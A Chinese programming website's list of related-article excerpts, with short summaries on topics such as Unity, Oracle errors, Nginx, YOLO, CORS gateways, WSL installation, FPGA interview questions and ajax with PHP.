如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Hallo部署指南

一、介绍 Hallo是由复旦大学、百度公司、苏黎世联邦理工学院和南京大学的研究人员共同提出的一个AI对口型肖像图像动画技术&#xff0c;可基于语音音频输入来驱动生成逼真且动态的肖像图像视频。 该框架采用了基于扩散的生成模型和分层音频驱动视觉合成模块&#xff0c;提高了…

【Unity学习笔记】解决疑似升级Win11或使用Unity6导致Unity旧版本无法打开的问题

【Unity学习笔记】解决疑似升级Win11或使用Unity6导致Unity旧版本无法打开的问题 一句话省流&#xff1a; 确保项目地址没有任何中文&#xff0c;重新申请个许可证&#xff0c;然后该咋就咋&#xff0c;完事。 ——————————————————————————————…

Oracle登录报错-ORA-01017: invalid username/password;logon denied

接上文&#xff1a;Oracle创建用户报错-ORA-65096: invalid common user or role name 我以为 按照上文在PDB里创建了用户&#xff0c;我以为就可以用PLSQL远程连接了&#xff0c;远程服务器上也安装了对应版本的Oracle客户端&#xff0c;但是我想多了&#xff0c;客户只是新建…

Nginx06-静态资源部署

零、文章目录 Nginx06-静态资源部署 1、静态资源概述 静态资源&#xff1a;是在Web开发中不经常改变的文件&#xff0c;比如图片、CSS样式表、JavaScript脚本文件等。这些资源通常是预先编译好的&#xff0c;不需要服务器端的动态处理。动态资源&#xff1a;是在Web开发中需…

【自动驾驶】《Planning-oriented Autonomous Driving》UniAD论文阅读笔记

1.参考 论文&#xff1a;https://arxiv.org/pdf/2212.10156 代码&#xff1a;https://github.com/OpenDriveLab/UniAD 2.摘要 原来的自动驾驶任务都是分为模块化的&#xff0c;感知&#xff0c;预测&#xff0c;规划等。每个独立的任务可能都优化得很好&#xff0c;但可能会…

深度学习基础—Anchor Boxes与YOLO 算法

前言&#xff1a;在之前的博客中&#xff0c;我依次总结了目标检测算法、算法的卷积改进、Bounding Box预测算法、交并比与非极大值抑制等内容&#xff0c;这些是YOLO 算法的重要细节&#xff0c;现在还差一柄利剑&#xff0c;我们就可以构建YOLO算法了&#xff0c;现在让我们先…

OJ在线评测系统 微服务高级 网关跨域权限校验 集中解决跨域问题 拓展 JWT校验和实现接口限流降级

微服务网关跨域权限校验 集中的去解决一下跨域 这段代码是用来配置跨源资源共享&#xff08;CORS&#xff09;过滤器的。它创建了一个 CorsConfiguration 实例&#xff0c;允许所有方法和头部&#xff0c;并支持凭证&#xff08;如 Cookies&#xff09;。setAllowedOriginPat…

【论文笔记】DKTNet: Dual-Key Transformer Network for small object detection

【引用格式】&#xff1a;Xu S, Gu J, Hua Y, et al. Dktnet: dual-key transformer network for small object detection[J]. Neurocomputing, 2023, 525: 29-41. 【网址】&#xff1a;https://cczuyiliu.github.io/pdf/DKTNet%20Dual-Key%20Transformer%20Network%20for%20s…

本田汽车投资SiLC Technologies:携手共促自动驾驶技术新飞跃

SiLC Technologies获本田汽车投资:加速自动驾驶技术革新 近日,硅谷光子学初创公司SiLC Technologies宣布获得本田汽车的投资,这一合作标志着双方将共同推进自动驾驶技术领域的革新与发展。本田此次投资不仅体现了对SiLC Technologies技术实力的认可,也彰显了本田在自动驾驶…

MATLAB工具库:数据统计分析工具MvCAT、MhAST等

MATLAB工具库&#xff1a;数据统计分析工具MvCAT、MhAST等 工具1&#xff1a;Multivariate Copula Analysis Toolbox (MvCAT)MATLAB中运行 工具2&#xff1a;Multi-hazard Scenario Analysis Toolbox (MhAST) 参考 The University of California-软件库-Software 工具1&#xf…

【源码+文档】基于SpringBoot+Vue校园智慧迎新服务平台

&#x1f6a9;如何选题&#xff1f; 如何选题、让题目的难度在可控范围&#xff0c;以及如何在选题过程以及整个毕设过程中如何与老师沟通&#xff0c;这些问题是需要大家在选题前需要考虑的&#xff0c;具体的方法我会在文末详细为你解答。 &#x1f6ad;如何快速熟悉一个项目…

饮料瓶识别系统源码分享

饮料瓶识别系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer Vision 研…

QSerialPort 串口通信示例

之前使用过MFC写过串口通信的示例&#xff0c;今年学了Qt&#xff0c;特意使用Qt写了串口通信的示例&#xff0c;发现比MFC要容易一些&#xff0c; MFC串口示例如下&#xff1a; Qt示例如下&#xff1a; Qt这个做的很简单&#xff0c;主要还是想验证一下api&#xff0c; 核心…

设计模式的学习

OO:Object-Oriented 面向对象 --- 《Head First设计模式》 这本书是用java写的&#xff0c;我是写C的&#xff0c;用C来写相关的代码 --- p2&#xff08;第二页&#xff09; #ifndef DUCK_H #define DUCK_H/*** brief The Duck class 鸭子类*/ class Duck { public:D…

如何让客户主动成为你的品牌大使

在销售领域&#xff0c;转介绍被公认为一把无坚不摧的利器&#xff0c;它不仅铸就了高成交率的辉煌&#xff0c;更以惊人的速度缩短了成交周期。一位精通转介绍艺术的销售员&#xff0c;其业绩自然熠熠生辉&#xff0c;工作之路亦显得游刃有余。 然而&#xff0c;面对这一宝藏…

Windows安装Linux子系统报错:WslRegisterDistribution failed with error: 0x8007019e

WslRegisterDistribution failed with error: 0x8007019e 报错截图如下图&#xff1a; 该处是由于没有安装Linux内核&#xff0c;因此需要安装。可前往官网查看详情&#xff1a;https://aka.ms/wslinstall 需要解决该问题&#xff0c;可参照官网方法&#xff08;我没试过官网…

【操作系统考研】2进程管理(1)

在翻看操作系统知识框架的时候&#xff0c;对一些概念的理解还比较模糊&#xff0c;现在我来理清他们的关系。 操作系统、处理器、进程、线程、内存、存储器、设备、文件的关系 咱们可以把计算机系统想象成一个大工厂&#xff0c;来理解这些概念之间的关系。 操作系统&#xf…

【FPGA】面试八股

1.FPGA的底层资源有哪些 &#xff08;1&#xff09;可编程的逻辑资源 可编程的逻辑单元由查找表&#xff08;LUT&#xff09;,数据选择器&#xff08;MUX&#xff09;,进位链&#xff08;Carry Chain&#xff09;和触发器&#xff08;Flip-Flop&#xff09; &#xff08;2&…

xmltodict 处理 XML 数据案例解析

简介&#xff1a;xmltodict 是一个用于将 XML 数据转换为 Python 字典的轻量级模块。它简化了 XML 数据的解析和处理&#xff0c;使得在 Python 中操作 XML 变得更加直观和方便。这个模块适合用于数据交换、配置文件解析等需要 XML 数据处理的场景。 历史攻略&#xff1a; loc…

ajax php

文章目录 get请求postget和post的异同点ajax原生步骤jquery步骤优点 php安装&#xff0c;后台处理脚本语言。 后端开发语言不能直接允许&#xff0c;必须放在服务器对对应的文件夹下运行。 如&#xff1a;wamp的对应服务器的文件夹是www get请求 <!DOCTYPE html> &l…